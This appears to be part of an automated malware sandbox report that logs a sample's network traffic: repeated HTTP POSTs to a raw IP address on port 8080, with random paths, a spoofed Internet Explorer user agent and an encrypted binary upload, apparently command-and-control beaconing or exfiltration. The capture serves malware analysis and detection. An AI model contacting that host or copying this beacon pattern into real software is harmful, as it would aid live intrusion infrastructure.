http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/	POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1 Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ Content-Type: multipart/form-data; boundary=---------------------------544661808859543 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 213.176.36.147:8080 Content-Length: 4548 Connection: Keep-Aliv

URI

Data

http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/

POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache


-----------------------------544661808859543
Content-Disposition: form-data; name="lwWTjyNlmoNoGd"; filename="sDwXwgJgpZcT"
Content-Type: application/octet-stream

\xc1\x13u\xd2\x0b\xff\x06\xa5\xc1\xcf+=P\x9e\xa5\x14\xc6\xff\xd0i\xe9\x96\x0c~\xfb`\xf5\x8d*\xa0\xb73J\x1d\xd6$\xfd\x85&#\x83\xe3A\xb4<\xbd]\x17\x95\x04\xf0|,\xc4\x8cv1\x92\xfe@m \x1c\x00QO\xcb\xe3\xff\x1a\xae\x0f\xbc\xeb\xb2i\xbf\x88YSk\x95v.\xc34\xbe\xc2\xb5=\xc6$w\x03KFO\x1e\xc3\xcd\xd6\x1c\xdbU\xdeL\xda\xdcl\xf3@\x82\x85d\xb9\x98W\x03\x9ad4\xf9\xbbo'\xd5\x9e\xb6\xc5\xdf\xd8k\xea\xef\xceP\xf5\xf0\x94X\xbf\xf1iY\x8a\xf7B\x00\xea\xd9VH20`\x14w\xd1\x7fy\x89\x19\x7f{\xe4\xc8\xfdh\xe7\xfe\x97\xa5\x06\xca\x1c1\xc7!\xc8A3z\xd4u)
z\xd3\x9d)\xe3d]3VS\x82\xfb\xfe\xd0\xb3i\xe4\x97\xfa\x12\xe7\xc9\x0f\xfe\xeb\xd4\xc1"\xe0\x08\xb5so\x1eE[\xd1\x00\x15\xc7\x00M\xefX"\x82\x93\xa0\x87]\xc8\x98m\xac\xe8z>\x80\x97\x98
x\x7fI\x92ud\x0e,\xd0\xc6\xe4\x84
\x1aQ\\x80]j\xeb*\xb5n\x9b\x11\xdby`U\x87K^mS\x92
1\x1e\x02=\x8e\x16\x90\xcb\xf7\x98n\xb4m\x1e\xab\x1d
\x1bC\x1a\xad\x19\x07$\xc5\x11b\xaaC
S\x90\x87BY\xc6\x1c\xcb0'e\xa2P\x13\x06$i}\xe4\x81\x12\xe5\xbe\x97\xde\x1dE5\xdc\xeeP\xee\x01XRF\xf0\xca\x0f\xd4r\x9d\x92\xcc\xc4\xfd\xfa\xad\xbd
&\x10\x8c^\xa1\xf0\xd5\xc2\x97O\xdc\xfb5U\xef\xfd.\x03/1\xea\x0c\\xc7fBH\x17\x1d\xc0\x84\xf9\xa9\x83WS\x1c\xdf\xbf/\xf5\x8c\x84W\xfb\x8b/\x1e36\xad\xfb\\xf7G\xec\x07\xca\xf9\xfb\xafBO5\x18Ozb\xd1\xf7\xec\x86!\xf2)k\xb5C\xc0\x8d+,\x05\x05\xa9t\xa4{\xf4
-----------------------------544661808859543--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/

POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache

http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/

POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1
Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/
Content-Type: multipart/form-data; boundary=---------------------------544661808859543
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 213.176.36.147:8080
Content-Length: 4548
Connection: Keep-Aliv

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.

Sorry! No dropped buffers.